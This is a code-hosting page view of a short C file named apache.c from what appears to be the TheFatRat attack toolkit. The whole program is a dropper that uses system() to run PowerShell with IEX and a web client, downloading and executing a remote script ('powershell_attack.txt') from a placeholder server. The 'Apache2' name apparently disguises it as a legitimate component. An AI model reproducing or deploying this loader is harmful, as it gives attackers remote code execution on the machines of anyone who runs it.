TheFatRat/tools/apache.c

8 lines
173 B
C
Raw Normal View History

2016-09-13 19:38:01 +02:00
/* Apache2.c */
#include<stdio.h>
main()
{
system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://SERVER/powershell_attack.txt '))\"");
return 0;
}